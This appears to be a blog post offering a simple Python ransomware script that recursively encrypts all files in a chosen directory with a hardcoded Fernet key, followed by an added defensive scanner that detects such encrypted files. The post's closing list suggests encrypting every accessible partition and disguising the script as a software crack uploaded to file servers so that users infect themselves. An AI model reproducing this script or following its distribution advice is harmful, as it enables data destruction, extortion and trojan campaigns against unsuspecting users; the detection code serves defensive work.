Ransomware with Python

Hello Everyone,

Ransomware has been a well-known attack for years, and it still exists. I have attempted a simple Python script which mimics the behavior of ransomware. Let’s see what Wiki says about ransomware.

Ransomware is a type of malware that restricts access to the infected computer system in some way, and demands that the user pay a ransom to the malware operators to remove the restriction. Some forms of Ransomware systematically encrypt files on the system’s hard drive, which become difficult or impossible to decrypt without paying the ransom for the encryption key, while some may simply lock the system and display messages intended to coax the user into paying. Ransomware typically propagates as a trojan, whose payload is disguised as a seemingly legitimate file; thus, Ransomware is an access-denial type of attack that prevents legitimate users from accessing files.[1]

I have tried to implement the ransomware concept in Python and came up with the following script. I have used the cryptography module, which uses a symmetric key [a single key for both encryption and decryption], to encrypt the binary content of files. Very soon I will post the script using AES 128-bit encryption. Instead of reading a lot of text, let’s have a look at the script.

Process:

Modules Needed: cryptography

Script Input 1: Directory Location to encrypt

Script Input 2: Action (Encryption/Decryption)

# Warning: This script involves encryption of files. Please use at your own risk.
# Script will prompt to input the location and action(Encrypt/Decrypt) to test and experience how ransomware will behave.
# I have used cryptography module to encrypt the content of file and have given the key too.
#########################################################################################################################
import os,subprocess
from cryptography.fernet import Fernet
 
fpath_list = []
#Encryption symmetric key
key = b'dS-CU3TI1pHCaS_cSukrviippvmkmrz7pOcU3v9cq9c='
#You can generate your key using the below line
#key = Fernet.generate_key()
f = Fernet(key)
 
#Add the file location to the global list
def evaluate_file(file_loc):
    global fpath_list
    ext_list = []
    fpath_list.append(str(file_loc))
    ext_list.append(str(file_loc).split(".")[1])
 
#Loop through the given location recursively
def nav_folder(dir_path):
    if os.path.isdir(dir_path):
        files = os.listdir(dir_path)
        for f in files:
            if not f.startswith('.'):
                if os.path.isdir(os.path.join(dir_path,f)):
                    nav_folder(os.path.join(dir_path,f))
                else:
                    evaluate_file(os.path.join(dir_path,f))
    else:
        evaluate_file(dir_path)
 
#Encrypt each file in the filepath global list
def encrypt(s_loc):
    global f
    for file in fpath_list:
        fname = str(file).replace("\\", "\\")
        try:
            sfile = open(fname, 'rb')
            final_string = f.encrypt(sfile.read())
            sfile.close()
            sfile = open(fname, 'wb')
            sfile.write(bytes(final_string))
            sfile.close()
        except Exception as e:
            exp_file = open('error.log','w')
            exp_file.writelines(e.message)
            exp_file.close()
 
#Decrypt each file in the filepath global list
def decrypt(d_loc):
    global f
    for file in fpath_list:
        fname = str(file).replace("\\", "\\")
        try:
            sfile = open(fname, 'rb')
            final_string = f.decrypt(sfile.read())
            sfile.close()
            sfile = open(fname, 'wb')
            sfile.write(bytes(final_string))
            sfile.close()
        except Exception as e:
            exp_file = open('error.log', 'w')
            exp_file.writelines(e.message)
            exp_file.close()
 
 
def main():
    s_loc = input("Enter the source location:")
    action = input("Enter action encrypt/decrypt (E/D)")
    nav_folder(s_loc)
    if action == "E":
        encrypt(s_loc)
    elif action == "D":
        decrypt(s_loc)
    else:
        print("Please enter proper action E or D")
if __name__ == '__main__':
     main()
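
For triage, files written by the script above are easy to recognise: the output of Fernet's encrypt() is a base64url token with a fixed layout (version byte 0x80, 64-bit timestamp, IV, AES-CBC ciphertext, HMAC), so it starts with "gAAAAA" and carries its creation time in clear. The following is an added example, not part of the original post, that flags such files using only the standard library and reports when each was encrypted; the names parse_fernet_header and scan_tree are hypothetical.

```python
import base64
import binascii
import os
import struct
import sys
from datetime import datetime, timezone

PREFIX = b"gAAAAA"            # base64url of version byte 0x80 plus zero high timestamp bits
FIXED_LEN = 1 + 8 + 16 + 32   # version, timestamp, IV, HMAC-SHA256 tag

def parse_fernet_header(data):
    """Return the token creation time (UTC) if data is shaped like a Fernet token, else None."""
    data = data.strip()
    if not data.startswith(PREFIX):
        return None
    try:
        raw = base64.urlsafe_b64decode(data)
    except (binascii.Error, ValueError):
        return None
    body = len(raw) - FIXED_LEN          # length of the AES-CBC ciphertext
    if raw[0] != 0x80 or body < 16 or body % 16:
        return None
    (ts,) = struct.unpack(">Q", raw[1:9])
    return datetime.fromtimestamp(ts, tz=timezone.utc)

def scan_tree(root):
    """Return {path: creation time} for every file under root shaped like a Fernet token."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    if fh.read(len(PREFIX)) != PREFIX:
                        continue         # cheap reject before reading the whole file
                    fh.seek(0)
                    when = parse_fernet_header(fh.read())
            except OSError:
                continue                 # unreadable file: skip and keep scanning
            if when is not None:
                hits[path] = when
    return hits

if __name__ == "__main__":
    # Constructed sample: structurally valid token bytes, not real ciphertext.
    sample = base64.urlsafe_b64encode(b"\x80" + struct.pack(">Q", 1700000000) + bytes(80))
    print("sample parsed as:", parse_fernet_header(sample))
    for path, when in sorted(scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items()):
        print(when.isoformat(), path)
```

A hit only means the file has the token structure; confirming it requires the key, which in this script is hardcoded in the source.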

Possibilities with this script:

  1. Existing partitions can be fetched, and every directory the script has permission to access can be encrypted.
  2. The Python script can be converted to an exe. Change the name and icon of the exe and upload it to file servers in the name of cracks (e.g. Adobe Photoshop Crack). That’s it. Users are very eager to download cracks which can give them full access to licensed products. So just use them. While typing this point I remember a line I read in a tweet: if you are not paying with money, you are paying with your data.
  3. Use this script to encrypt your personal data and keep the key safe 🙂